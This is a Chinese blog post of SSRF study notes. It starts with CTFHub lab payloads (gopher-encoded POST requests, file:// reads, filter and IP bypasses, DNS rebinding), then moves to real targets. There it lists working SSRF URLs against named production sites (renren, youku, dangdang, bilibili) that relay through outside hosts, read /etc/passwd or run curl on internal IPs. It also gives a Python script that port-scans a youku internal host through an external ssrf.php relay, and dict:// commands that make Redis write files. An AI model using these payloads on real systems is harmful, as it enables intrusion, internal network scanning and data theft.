SSRF专题

迷南。 2022-12-27 14:20 129阅读 0赞

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70]  
修复方法:四个限定

①限定ip,url
    ②限定协议
    ③内外网限制

# 一.基础ssrf #

①内网伪造  
如  
即伪造访问内网的flag.php内容状况类

http://challenge-0b0cb1735e1d9316.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php
    #骚思路
    #可以利用127.0.0.1:1234类进行改变端口重而对端口实现爆破

②利用文件读取类  
即利用file://协议读取思路

?url=file:///var/www/html/flag.php

# 二.进阶ssrf #

## 1.基础知识 ##

post情况构造包从而伪造ssrf  
思路方法  
`基础知识`  
利用curl命令构造请求包  
curl基础知识

#curl url(获取网址的文本信息)
    curl www.baidu.com
    #curl -i url(获取文本的头部及文本信息)
    curl -i www.baidu.com
    #curl -v(获取整个通信过程)
    curl -v www.baidu.com
    #curl -X url(使用特定方法请求网页文本)
    curl -X GET www.baidu.com

gopher基础知识  
文件传输服务

Gopher是Internet上一个信息查找系统，它将Internet上的文件组织成某种
    索引，方便用户从Internet的一处带到另一处。
    结构： gopher://127.0.0.1:80/内容(比如POST请求)
    其中内容可以是字符串，php代码，文件等。ip一般不用换，端口号要根据漏洞利用的环境更换。比如FASTCGI的9000端口
    
    要点：
    
    目标文件得有一些对应的利用功能，本题采用curl执行语句进行利用

构造方法

如返回包为如下类型

POST /flag.php HTTP/1.1
    Host: 127.0.0.1:80#host改成自己要伪造的host状况,在这里即构造host为127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 36

则gopher数据构造方法

POST /flag.php HTTP/1.1
    Host: 127.0.0.1:80
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 36
    
    key=1664d1affa5622d9f613aa331306d6e9

经过两次编码  
如两次编码

#编码次数-->取决于内部类请求的相对次数,在这里请求次数为2次，请求第一次,客户端向服务端进行请求，请求第二次,gopher向127.0.0.1发送请求
    #编码1完成后
    将%0A更改为%0D%0A
    #在进行编码2

#即构造完整为
    ?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=1664d1affa5622d9f613aa331306d6e9

或者利用curl或者进行执行  
利用curl思路代  
–>直接cmd命令执行即可

curl -vvv 'http://challenge-de43eaec0618623b.sandbox.ctfhub.com:10080/?url=http://127.0.0.1/302.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250d%25250aHost%25253A%252520127.0.0.1%253a80%25250d%25250aContent-Length%25253a%25252036%25250d%25250aContent-Type%25253a%252520application%25252fx-www-form-urlencoded%25250d%25250a%25250d%25250akey%253defba86faaeaff11dea094633e47cd06a'

或者直接代burp进行

## 攻击方式 ##

①攻击Redis  
三种攻击方式

写webshell
    写密钥
    定时任务炸弹

这里直接利用redis-over-gopher.py进行攻生成相关的payload![在这里插入图片描述][2021010920012023.png]

②攻击MySQL

③攻击PHP-FPM

④攻击内网中的脆弱Web应用

后面两种暂时先放一下,后面进阶的话专项突破下  
[两种协议][Link 1]

# SSRF绕过专题 #

## 内网结合重定向类 ##

urlbypass–>即利用语句进行拼接从而实现ssrf访问其他网站

#url跳转bypass
    1.利用问好绕过限制url=https://www.baidu.com?www.xxxx.me
    #url=https://www.baidu.com?127.0.0.1/flag.php
    
    2.利用@绕过限制url=https://www.baidu.com@www.xxxx.me
    #url=https://www.baidu.com?127.0.0.1/flag.php
    3.利用斜杠反斜杠绕过限制
    4.利用#绕过限制url=https://www.baidu.com#www.xxxx.me
    5.利用子域名绕过
    6.利用畸形url绕过
    7.利用跳转ip绕过

①IP的限制

#数字bypass
    如127.0.0.1这个ip
    1.)可以用localhost进行绕
    2.)可以用转16进制编码绕如0x7F000001/flag.php
    3.)linux情况下0代表127.0.0.1
    #即可以利用代http://0

如  
即可改为localhost/flag.php  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 1]  
②302跳转  
绑定一个域名进行绕过滤的参数即可  
③url的解析问题

#利用不同的语言或者组件解析规则不同进行绕即可

④DNS重绑

即一个域名绑定两个ip然后绕过安全判定机制

相关的url  
[dns重绑定测试的网站][dns]  
[域名申请的网站][Link 2]

# 实战中典型利用 #

# 挖掘思路 #

1、寻找WEB应用功能、抓包分析链接请求敏感参数
    
    2、是否有过滤，是否进行绕过尝试
    
    3、验证是否可回显（是否能能够探测内网）
    
    4、判断支持协议，是否能获取更多信息
    
    5、攻击内网应用服务

典型漏洞处：  
①直接加载lang\_en.php  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 2]  
即直接替代lang\_en.php即可进行攻击

②加载图片类,采取的是服务端发送的请求代的请求

③进行分享链接处

④英文翻译类接口处  
⑤采集功能处

利用方法:  
1.利用curl协议跳转其他协议方式代  
如下

http://war.gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img]
    http://kd.gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren4.22e642.dnslog.info/?data=helo.jpg[/img]
    http://fans.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img]
    http://gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renr
    #优酷站
    http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip={ ip}%26port={ port}%26dat
    #
    http://club.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img]
    #当当网-->以前的-->利用ssrf读取本地文件
    http://caipiao.dangdang.com/api/get.php?cache_lifetime=30&call_time=1467988328&method=header&source=a8d620b2bb6cce75bd6d7db53c1486e2&url=file:///etc/passwd
    
    #探测内网方法
    http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=curl%20172.18.9.16

2.内网扫描端口利用脚本

#!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # @Author: Lcy
    # @Date: 2016-07-05 20:55:30
    # @Last Modified by: Lcy
    # @Last Modified time: 2016-07-11 09:28:01
    import requests
    import threading
    import Queue
    import time
    threads_count = 1
    que = Queue.Queue()
    lock = threading.Lock()
    threads = []
    ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
    for i in ports:
        que.put(str(i))
    def run():
        while que.qsize() > 0:
            p = que.get()
            try:
                url = "http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(
                    port=p)
                time.sleep(0.3)
                r = requests.get(url,timeout=1.8)
            except:
                lock.acquire()
                print "{port} Open".format(port=p)
                lock.release()
    for i in range(threads_count):
        t = threading.Thread(target=run)
        threads.append(t)
        t.setDaemon(True)
        t.start()
    while que.qsize() > 0:
        time.sleep(1.0)

3.典型测试是否存在ssrf类  
典型两个dnslog网站（利用DNS的解析记录的日志进行查看是否存在一些漏洞）

http://ceye.io
    http://www.dnslog.cn/

测试

①如测xss
    <img src=http://hf8r67.dnslog.cn>
    ②直接请求这个网站进行ssrf判断

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 3]

4.)生成gopher协议payload的工具  
https://github.com/firebroo/sec\_tools

协议命令直接代类
    1.写入内容；
     dict://127.0.0.1:6379/set❌test
    
    2.设置保存路径；
    dict://127.0.0.1:6379/config:set:dir:/tmp/
    
    3.设置保存文件名；
    dict://127.0.0.1:6379/config:set:dbfilename:1.png
    
    4.保存。
    dict://127.0.0.1:6379/save

如利用命令1设置一个test方法  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 4]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70]: /images/20221120/18a8838bc3a64e428f26110cef097783.png
[2021010920012023.png]: /images/20221120/bae02cdb6d044f01940a6c42c7ca3a49.png
[Link 1]: https://blog.csdn.net/rfrder/article/details/108589988
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 1]: /images/20221120/9b53be3324cd426f8633fa7862fd0be3.png
[dns]: https://lock.cmpxchg8b.com/rebinder.html?tdsourcetag=s_pctim_aiomsg
[Link 2]: http://ceye.io/introduce
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 2]: /images/20221120/2b284d240bbd47779ae72bed6a71e9c1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 3]: /images/20221120/a28a4dd26cb14400bef243eea7b89196.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzOTQyMDQw_size_16_color_FFFFFF_t_70 4]: /images/20221120/b4a3ff1956434853918d2ba792e191f3.png